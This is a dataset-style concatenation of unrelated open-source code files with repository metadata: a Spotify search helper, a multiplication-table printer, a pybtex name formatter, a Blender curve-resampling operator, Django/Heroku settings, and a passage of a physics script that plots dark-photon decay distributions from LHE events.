song = song_name
for word in words_to_remove:
artist = re.sub(word,'',artist)
for word in words_to_remove_from_songs:
song = re.sub(word,'', song)
#Generate database used to hold returned items
song_details= pd.DataFrame()
try:
query = 'track:%s artist:%s' %(song,artist)
result = spotify.search(q=query)
#Select the first item (assume spotify returns what I want on first result)
first_result = result['tracks']['items'][0]
#From first result, pull specific variables
track_id = first_result['id']
album_id = first_result['album']['id']
artist_id = first_result['artists'][0]['id']
release_date = first_result['album']['release_date']
#Add variables to dataframe
song_details['Performer'] = [artist_name]
song_details['Song'] = [song_name]
song_details['track_id'] = [track_id]
song_details['artist_id'] = [artist_id]
song_details['album_id'] = [album_id]
song_details['release_date'] = [release_date]
song_details['search_query'] = [query]
track_features = spotify.audio_features(tracks=track_id)
if len(track_features)>1:
print('multiple songs are returned for some reason')
track_features = track_features[0]
for key, value in track_features.items():
song_details[key] = [value]
except IndexError: #for few weird ones + cases where song isn't on spotify
print("Search term \"%s\" is giving trouble" %(query))
pass
return(song_details)
| [
"[email protected]"
]
| |
1da5693613af676b6218173be8e0870435f4b8b1 | 7b695f34ee8a45f7609064ec47e861825f2d96a8 | /week4/multiplication.py | 4b2154562589d72befaaa62da3ad7cee1620d82a | []
| no_license | deciduously/cmit135 | de0c151c3642f25ecc6ef76d299d46b7810c753e | a74544f529a654e499ef34d6ca1a35c0b5cd71d2 | refs/heads/master | 2020-04-19T06:19:55.122853 | 2019-02-28T00:13:41 | 2019-02-28T00:13:41 | 168,014,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | # multiplication.py pretty prints a multiplication table
# Function to return the number of digits a number n has
def num_digits(n):
# Converts it to a string a counts the length - the math way would work too but this is easy
return len(str(n))
def draw_table(n):
# calculate this outside the loop so we dont run it every iteration
total_size = n*n
for i in range(1, n):
for j in range(1, n):
# Print the product of the indices
current_cell = i*j
# Use the size difference betwene the max value and the current value to determine current cell padding
padding = ' ' * (1 + num_digits(total_size) -
num_digits(current_cell))
print(padding + str(i*j), end="")
print()
# draw with 10
draw_table(10)
| [
"[email protected]"
]
| |
62ab32f13bfb48de1118f28c062ed0d2f5702325 | 6e5c83baa19e09bcc59300d764ce936f8cbe6b5b | /pybtex/style/names/plain.py | 62c0c2ca311b0e086a1a078c4410d14d84d02f38 | [
"MIT"
]
| permissive | rybesh/pybtex | 84e10b12f6c9ade0de2af638bfc23945109eff6d | 18e0b5336f07ebc5dc97aa899362fb292ea7bb5a | refs/heads/master | 2016-08-07T20:15:26.865726 | 2011-03-18T18:03:48 | 2011-03-18T18:03:48 | 1,246,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,441 | py | # Copyright (c) 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from pybtex.style.template import join
from pybtex.style.names import BaseNameStyle, name_part
class NameStyle(BaseNameStyle):
name = 'plain'
def format(self, person, abbr=False):
r"""
Format names similarly to {ff~}{vv~}{ll}{, jj} in BibTeX.
>>> from pybtex.core import Person
>>> name = Person(string=r"Charles Louis Xavier Joseph de la Vall{\'e}e Poussin")
>>> plain = NameStyle().format
>>> print plain(name).format().plaintext()
Charles Louis Xavier<nbsp>Joseph de<nbsp>la Vall{\'e}e<nbsp>Poussin
>>> print plain(name, abbr=True).format().plaintext()
C.<nbsp>L. X.<nbsp>J. de<nbsp>la Vall{\'e}e<nbsp>Poussin
>>> name = Person(first='First', last='Last', middle='Middle')
>>> print plain(name).format().plaintext()
First<nbsp>Middle Last
>>> print plain(name, abbr=True).format().plaintext()
F.<nbsp>M. Last
>>> print plain(Person('de Last, Jr., First Middle')).format().plaintext()
First<nbsp>Middle de<nbsp>Last, Jr.
"""
return join [
name_part(tie=True) [person.first(abbr) + person.middle(abbr)],
name_part(tie=True) [person.prelast()],
name_part [person.last()],
name_part(before=', ') [person.lineage()]
]
| [
"[email protected]"
]
| |
86e497f7d8b7f8e601d5bdf3d3d634b51fbc04bf | e82b761f53d6a3ae023ee65a219eea38e66946a0 | /All_In_One/addons/hair_tool/curves_resample.py | bbf794543f831be09e4c96a6a4ed9485f74a8093 | []
| no_license | 2434325680/Learnbgame | f3a050c28df588cbb3b14e1067a58221252e2e40 | 7b796d30dfd22b7706a93e4419ed913d18d29a44 | refs/heads/master | 2023-08-22T23:59:55.711050 | 2021-10-17T07:26:07 | 2021-10-17T07:26:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,061 | py | # This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Copyright (C) 2017 JOSECONSCO
# Created by JOSECONSCO
import bpy
import math
import numpy as np
from bpy.props import EnumProperty, FloatProperty, BoolProperty, IntProperty, StringProperty
from .resample2d import interpol_Catmull_Rom, get_strand_proportions
class HT_OT_CurvesResample(bpy.types.Operator):
bl_label = "Curve resample"
bl_idname = "object.curve_resample"
bl_description = "Change ammount of points on curve"
bl_options = {"REGISTER", "UNDO"}
hairType: bpy.props.EnumProperty(name="Output Curve Type", default="NURBS",
items=(("BEZIER", "Bezier", ""),
("NURBS", "Nurbs", ""),
("POLY", "Poly", "")))
# bezierRes: IntProperty(name="Bezier resolution", default=3, min=1, max=12)
t_in_y: IntProperty(name="Strand Segments", default=8, min=3, max=20)
uniformPointSpacing: BoolProperty(name="Uniform spacing", description="Distribute stand points with uniform spacing", default=False)
equalPointCount: BoolProperty(name="Equal point count", description="Give all cures same points count \n"
"If disabled shorter curves will have less points", default=False)
onlySelection: BoolProperty(name="Only Selected", description="Affect only selected points", default=False)
def invoke(self, context, event):
particleObj = context.active_object
if particleObj.mode == 'EDIT':
self.onlySelection = True
elif particleObj.mode == 'OBJECT':
self.onlySelection = False
Curve = context.active_object
if not Curve.type == 'CURVE':
self.report({'INFO'}, 'Use operator on curve type object')
return {"CANCELLED"}
self.input_spline_type = Curve.data.splines[0].type
self.hairType = self.input_spline_type # hair type - output spline
if self.input_spline_type == 'NURBS':
self.nurbs_order = Curve.data.splines[0].order_u
if len(Curve.data.splines) > 0: # do get initnial value for resampling t
polyline = Curve.data.splines[0] # take first spline len for resampling
if polyline.type == 'NURBS' or polyline.type == 'POLY':
self.t_in_y = len(polyline.points)
else:
self.t_in_y = len(polyline.bezier_points)
self.bezierRes = Curve.data.resolution_u
return self.execute(context)
def execute(self, context):
curveObj = context.active_object
if curveObj.type != 'CURVE':
self.report({'INFO'}, 'Works only on curves')
return {"CANCELLED"}
pointsList = []
pointsRadius = []
pointsTilt = []
selectedSplines = []
if self.onlySelection:
for polyline in curveObj.data.splines:
if polyline.type == 'NURBS' or polyline.type == 'POLY':
if any(point.select == True for point in polyline.points):
selectedSplines.append(polyline)
else:
if any(point.select_control_point == True for point in polyline.bezier_points):
selectedSplines.append(polyline)
if not selectedSplines:
selectedSplines = curveObj.data.splines
else:
selectedSplines = curveObj.data.splines
for polyline in selectedSplines: # for strand point
if polyline.type == 'NURBS' or polyline.type == 'POLY':
points = polyline.points
else:
points = polyline.bezier_points
if len(points) > 1: # skip single points
pointsList.append([point.co.to_3d() for point in points])
pointsRadius.append([point.radius for point in points])
pointsTilt.append([point.tilt for point in points])
backup_mat_indices = [spline.material_index for spline in selectedSplines]
interpolRad = []
interpolTilt = []
splinePointsList = interpol_Catmull_Rom(pointsList, self.t_in_y, uniform_spacing = self.uniformPointSpacing, same_point_count=self.equalPointCount)
if self.equalPointCount: # each output spline will have same point count
t_ins_y = [i / (self.t_in_y - 1) for i in range(self.t_in_y)]
for radii, tilts in zip(pointsRadius, pointsTilt): # per strand
t_rad = [i / (len(radii) - 1) for i in range(len(radii))]
interpolRad.append(np.interp(t_ins_y, t_rad, radii)) # first arg len() = out len
interpolTilt.append(np.interp(t_ins_y, t_rad, tilts)) # first arg len() = out len
else: # shorter output splines will have less points
lens = [len(x) for x in splinePointsList]
for radii, tilts, strandLen in zip(pointsRadius, pointsTilt, lens): # per strand
t_ins_Normalized = [i / (strandLen - 1) for i in range(strandLen)]
t_rad = [[i / (len(radii) - 1) for i in range(len(radii))]]
interpolRad.append(np.interp(t_ins_Normalized, t_rad[0], radii)) # first arg len() = out len
interpolTilt.append(np.interp(t_ins_Normalized, t_rad[0], tilts)) # first arg len() = out len
curveData = curveObj.data
# spline_type =
if self.onlySelection:
for spline in selectedSplines:
curveData.splines.remove(spline)
else:
curveData.splines.clear()
newSplines = []
for k, splinePoints in enumerate(splinePointsList): # for each strand/ring
curveLenght = len(splinePoints)
polyline = curveData.splines.new(self.hairType)
newSplines.append(polyline)
if self.hairType == 'BEZIER':
polyline.bezier_points.add(curveLenght - 1)
elif self.hairType == 'POLY' or self.hairType == 'NURBS':
polyline.points.add(curveLenght - 1)
if self.hairType == 'NURBS':
polyline.order_u = self.nurbs_order if self.input_spline_type == 'NURBS' else 3
polyline.use_endpoint_u = True
np_splinePointsOnes = np.ones((len(splinePoints), 4)) # 4 coord x,y,z ,1
np_splinePointsOnes[:, :3] = splinePoints
if self.hairType == 'BEZIER':
polyline.bezier_points.foreach_set('co', np_splinePointsOnes[:, :3])
polyline.bezier_points.foreach_set('radius', interpolRad[k])
polyline.bezier_points.foreach_set('tilt', interpolTilt[k])
polyline.bezier_points.foreach_set('handle_left_type', 'AUTO')
polyline.bezier_points.foreach_set('handle_right_type', 'AUTO')
else:
polyline.points.foreach_set('co', np_splinePointsOnes.ravel())
polyline.points.foreach_set('radius', interpolRad[k])
polyline.points.foreach_set('tilt', interpolTilt[k])
curveData.resolution_u = self.bezierRes
# bpy.ops.object.curve_uv_refresh()
for backup_mat, newSpline in zip(backup_mat_indices, newSplines):
newSpline.material_index = backup_mat
return {"FINISHED"}
| [
"[email protected]"
]
| |
32b358403cf8563ce1aad3ed0d74d9abb0359e78 | c5edd407319c80640ed4e2819838fec94ee7a345 | /raterz/settings.py | 31ebd662a31757c7cdfd225ed059c47ef34cb724 | [
"MIT"
]
| permissive | OwenMur21/raterz | 41abece2ac878932a36367b3e12482a9c34ac68c | 2e028e1fbb8832d90731fec10d5c3401b543384c | refs/heads/master | 2020-04-01T01:31:08.865849 | 2018-10-17T04:48:41 | 2018-10-17T04:48:41 | 152,741,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,577 | py | import os
import django_heroku
import dj_database_url
from decouple import config, Csv
MODE=config("MODE", default="dev")
SECRET_KEY = config('SECRET_KEY')
DEBUG = config('DEBUG', default=False, cast=bool)
# development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
# 'HOST': config('DB_HOST'),
# 'PORT': '',
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
ALLOWED_HOSTS = ['*']
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pro.apps.ProConfig',
'bootstrap3',
'rest_framework',
'rest_framework.authtoken',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'raterz.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
WSGI_APPLICATION = 'raterz.wsgi.application'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
django_heroku.settings(locals())
| [
"[email protected]"
]
| |
59411623046d6332476124e04690091dcaed47f4 | 25864296fe1d059bba11e999541828ea5eadc5b9 | /DarkSUSY_mH_125/mGammaD_0275/cT_10000/DarkSUSY_LHE_read.py | 67e6e5eb47bd296666d7acc0323970e5aa374aa6 | []
| no_license | bmichlin/MuJetAnalysis_DarkSusySamples_LHE_13TeV_01 | 17965f8eddf65d24a7c3c8ab81f92c3fc21f4f58 | 1de8d11f1a2e86874cd92b9819adbad4a6780b81 | refs/heads/master | 2020-06-14T12:54:38.920627 | 2015-03-18T14:00:07 | 2015-03-18T14:00:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111,093 | py | import ROOT, array, os, re, math, random, string
from math import *
from operator import itemgetter
def getStringBetween(name, first, second):
begOf1 = name.find(first)
endOf1 = len(first) + begOf1
begOf2 = name.find(second)
desiredString = name[endOf1:begOf2]
return desiredString
muonID = 13
higgsID = 25
n1ID = 3000002
nDID = 3000001
nExit = 80002
#nExit = 1000
gammaDID = 3000022
hMass = "125"
n1Mass = "10"
nDMass = "1"
filename = "DarkSUSY_mH_125_mGammaD_0275_13TeV_cT_10000_madgraph452_bridge224_events80k.lhe"
filename = "DarkSUSY_mH_125_mGammaD_0275_13TeV_cT_10000_madgraph452_bridge224_events80k.lhe"
f = open(filename, 'r')
if len(filename) >= 77:
mass_GammaD = getStringBetween(filename, "mGammaD_","_13TeV_cT")
lifetime_GammaD = getStringBetween(filename, "_cT_","_madgraph452")
energy = getStringBetween(filename, mass_GammaD + "_","TeV_")
mass_Higgs = getStringBetween(filename, "_mH_","_mGammaD_")
lifetime_GammaD_Legend = lifetime_GammaD[0:-2] + "." + lifetime_GammaD[len(lifetime_GammaD)-2:len(lifetime_GammaD)]
mass_GammaD_Legend = mass_GammaD[0:-3] + "." + mass_GammaD[len(mass_GammaD)-3:len(lifetime_GammaD)+1]
#mass_GammaD = filename[24:-49]
#lifetime_GammaD = filename[38:-36]
#energy = filename[29:-46]
#mass_Higgs = filename[12:-62]
#lifetime_GammaD_Legend = filename[38:-38] + "." + filename[39:-36]
#mass_GammaD_Legend = filename [24:-52] + "." + filename[25:-49]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "." and len(mass_GammaD_Legend) <= 3: mass_GammaD_Legend = mass_GammaD_Legend + "0"
switch = 0
if lifetime_GammaD_Legend[len(lifetime_GammaD_Legend)-1] == "0":
lifetime_GammaD_Legend = lifetime_GammaD_Legend[:-1]
switch = 1
if lifetime_GammaD_Legend[len(lifetime_GammaD_Legend)-1] == "0" and switch == 1: lifetime_GammaD_Legend = lifetime_GammaD_Legend[:-1]
else:
lifetime_GammaD = "000"
lifetime_GammaD_Legend = "0.00"
mass_GammaD = getStringBetween(filename, "mGammaD_","_13TeV")
energy = getStringBetween(filename, mass_GammaD + "_","TeV")
mass_Higgs = getStringBetween(filename, "_mH_","_mGammaD_")
mass_GammaD_Legend = mass_GammaD[0:-3] + "." + mass_GammaD[len(mass_GammaD)-3:len(lifetime_GammaD)+1]
#mass_GammaD = filename[24:-42]
#energy = filename[29:-39]
#mass_Higgs = filename[12:-55]
#mass_GammaD_Legend = filename[24:-45] + "." + filename[25:-42]
#lifetime_GammaD = "000"
#lifetime_GammaD_Legend = "0.00"
print mass_GammaD
print lifetime_GammaD
print lifetime_GammaD_Legend
print mass_GammaD_Legend
BAM = ROOT.TFile("ValidationPlots_mGammaD_" + mass_GammaD + "_" + energy + "_TeV_cT_" + lifetime_GammaD + ".root" , "RECREATE")
execfile("tdrStyle.py")
cnv = ROOT.TCanvas("cnv", "cnv")
txtHeader = ROOT.TLegend(.17,.935,0.97,1.)
txtHeader.SetFillColor(ROOT.kWhite)
txtHeader.SetFillStyle(0)
txtHeader.SetBorderSize(0)
txtHeader.SetTextFont(42)
txtHeader.SetTextSize(0.045)
txtHeader.SetTextAlign(22)
#txtHeader.SetHeader("CMS Simulation")
txtHeader.SetHeader("CMS Simulation (LHE) " + energy + " TeV")
#txtHeader.SetHeader("CMS Prelim. 2011 #sqrt{s} = 7 TeV L_{int} = 5.3 fb^{-1}")
#txtHeader.SetHeader("CMS 2011 #sqrt{s} = 7 TeV L_{int} = 5.3 fb^{-1}")
#txtHeader.SetHeader("CMS Prelim. 2012 #sqrt{s} = 8 TeV L_{int} = 20.65 fb^{-1}")
#txtHeader.SetHeader("CMS 2012 #sqrt{s} = 8 TeV L_{int} = 20.65 fb^{-1}")
txtHeader.Draw()
#info = ROOT.TLegend(0.33,0.8222222,0.9577778,0.9122222)
info = ROOT.TLegend(0.4566667,0.82,0.7822222,0.9066667)
info.SetFillColor(ROOT.kWhite)
info.SetFillStyle(0)
info.SetBorderSize(0)
info.SetTextFont(42)
info.SetTextSize(0.02777778)
info.SetMargin(0.13)
info.SetHeader("#splitline{pp #rightarrow h #rightarrow 2n_{1} #rightarrow 2n_{D} + 2 #gamma_{D} #rightarrow 2n_{D} + 4#mu}{#splitline{m_{h} = " + mass_Higgs + " GeV, m_{n_{1}} = 10 GeV, m_{n_{D}} = 1 GeV}{m_{#gamma_{D}} = " + mass_GammaD_Legend + " GeV, c#tau_{#gamma_{D}} = " + lifetime_GammaD_Legend + " mm}}" )
#info.SetHeader("#splitline{pp #rightarrow h #rightarrow 2n_{1} #rightarrow 2n_{D} + 2 #gamma_{D} #rightarrow 2n_{D} + 4#mu}{#splitline{#gamma_{D} c#tau = "+lifetime_GammaD_Legend + "mm, Mass = " + mass_GammaD_Legend + "GeV}{M of h = " + hMass + "GeV, M of n_{1} = " + n1Mass + "GeV, M of n_{D} = " + nDMass + "GeV}}" )
txtHeader2 = ROOT.TLegend(0.01333333,0.9311111,0.8133333,0.9955556)
txtHeader2.SetFillColor(ROOT.kWhite)
txtHeader2.SetFillStyle(0)
txtHeader2.SetBorderSize(0)
txtHeader2.SetTextFont(42)
txtHeader2.SetTextSize(0.045)
txtHeader2.SetTextAlign(22)
txtHeader2.SetHeader("CMS Simulation #sqrt{s} = " + energy + " TeV")
################################################################################
# pT of muons
################################################################################
Etmiss_dummy = ROOT.TH1F("Etmiss_dummy","Etmiss_dummy", 100, 0, 100)
Etmiss_dummy.SetTitleOffset(1.5, "Y")
Etmiss_dummy.SetTitleOffset(1.4, "X")
Etmiss_dummy.SetTitleSize(0.04,"X")
Etmiss_dummy.SetXTitle("MET = #sum_{n_{D}}#vec{p_{T}} [GeV]")
Etmiss_dummy.SetYTitle("Fraction of events / 1 GeV")
Etmiss_dummy.SetMaximum( 0.1 )
Etmiss = ROOT.TH1F("Etmiss","Etmiss", 100, 0, 100)
Etmiss.SetLineColor(ROOT.kBlue)
Etmiss.SetLineWidth(2)
Etmiss.SetLineStyle(1)
nBins = 125
binMin = 0.0
binMax = 125.0
yMax = 0.25
cTlow = 0
if float(lifetime_GammaD_Legend) != 0:
cTlim = float(lifetime_GammaD_Legend)*5
binwidth = float(lifetime_GammaD_Legend)
numBins = int(cTlim/binwidth)
binwidthRound = round(binwidth,3)
else:
cTlim = 10
binwidth = 1
numBins = int(cTlim/binwidth)
binwidthRound = "1"
formula = "exp(-x/"+ lifetime_GammaD_Legend +")/("+ lifetime_GammaD_Legend + "*(1 - exp(-" + str(cTlim) + "/" + lifetime_GammaD_Legend + ")))"
print formula
h_gammaD_cT_dummy = ROOT.TH1F("h_gammaD_cT_dummy", "h_gammaD_cT_dummy", numBins, 0, cTlim)
#h_gammaD_cT_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_dummy.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_cT_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_dummy.SetMaximum( 10 )
h_gammaD_cT = ROOT.TH1F("h_gammaD_cT", "h_gammaD_cT", numBins, 0, cTlim)
h_gammaD_cT.SetLineColor(ROOT.kBlue)
h_gammaD_cT.SetLineWidth(2)
h_gammaD_cT.SetLineStyle(1)
h_gammaD_cT_lab_dummy = ROOT.TH1F("h_gammaD_cT_lab_dummy", "h_gammaD_cT_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_lab_dummy.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_cT_lab_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_lab = ROOT.TH1F("h_gammaD_cT_lab", "h_gammaD_cT_lab", numBins, 0, cTlim)
h_gammaD_cT_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_lab.SetLineWidth(2)
h_gammaD_cT_lab.SetLineStyle(1)
h_gammaD_cT_XY_lab_dummy = ROOT.TH1F("h_gammaD_cT_XY_lab_dummy", "h_gammaD_cT_XY_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_XY_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_XY_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_XY_lab_dummy.SetXTitle("L_{XY} of #gamma_{D} [mm]")
h_gammaD_cT_XY_lab_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_XY_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_XY_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_XY_lab = ROOT.TH1F("h_gammaD_cT_XY_lab", "h_gammaD_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_cT_XY_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_XY_lab.SetLineWidth(2)
h_gammaD_cT_XY_lab.SetLineStyle(1)
h_gammaD_cT_Z_lab_dummy = ROOT.TH1F("h_gammaD_cT_Z_lab_dummy", "h_gammaD_cT_Z_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_Z_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_Z_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_Z_lab_dummy.SetXTitle("L_{Z} of #gamma_{D} [mm]")
h_gammaD_cT_Z_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_cT_Z_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_Z_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_Z_lab = ROOT.TH1F("h_gammaD_cT_Z_lab", "h_gammaD_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_cT_Z_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_Z_lab.SetLineWidth(2)
h_gammaD_cT_Z_lab.SetLineStyle(1)
h_gammaD_1_cT_dummy = ROOT.TH1F("h_gammaD_1_cT_dummy", "h_gammaD_1_cT_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_dummy.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_1_cT_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_dummy.SetMaximum( 10 )
h_gammaD_1_cT = ROOT.TH1F("h_gammaD_1_cT", "h_gammaD_1_cT", numBins, 0, cTlim)
h_gammaD_1_cT.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT.SetLineWidth(2)
h_gammaD_1_cT.SetLineStyle(1)
h_gammaD_1_cT_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_lab_dummy", "h_gammaD_1_cT_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_lab_dummy.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_1_cT_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_lab = ROOT.TH1F("h_gammaD_1_cT_lab", "h_gammaD_1_cT_lab", numBins, 0, cTlim)
h_gammaD_1_cT_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_lab.SetLineWidth(2)
h_gammaD_1_cT_lab.SetLineStyle(1)
h_gammaD_1_cT_XY_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_XY_lab_dummy", "h_gammaD_1_cT_XY_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_XY_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_XY_lab_dummy.SetXTitle("L_{XY} of #gamma_{D} [mm]")
h_gammaD_1_cT_XY_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_XY_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_XY_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_XY_lab = ROOT.TH1F("h_gammaD_1_cT_XY_lab", "h_gammaD_1_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_1_cT_XY_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_XY_lab.SetLineWidth(2)
h_gammaD_1_cT_XY_lab.SetLineStyle(1)
h_gammaD_1_cT_Z_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_Z_lab_dummy", "h_gammaD_1_cT_Z_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_Z_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_Z_lab_dummy.SetXTitle("L_{Z} of #gamma_{D} [mm]")
h_gammaD_1_cT_Z_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_Z_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_Z_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_Z_lab = ROOT.TH1F("h_gammaD_1_cT_Z_lab", "h_gammaD_1_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_1_cT_Z_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_Z_lab.SetLineWidth(2)
h_gammaD_1_cT_Z_lab.SetLineStyle(1)
h_gammaD_2_cT = ROOT.TH1F("h_gammaD_2_cT", "h_gammaD_2_cT", numBins, 0, cTlim)
h_gammaD_2_cT.SetLineColor(ROOT.kRed)
h_gammaD_2_cT.SetLineWidth(2)
h_gammaD_2_cT.SetLineStyle(1)
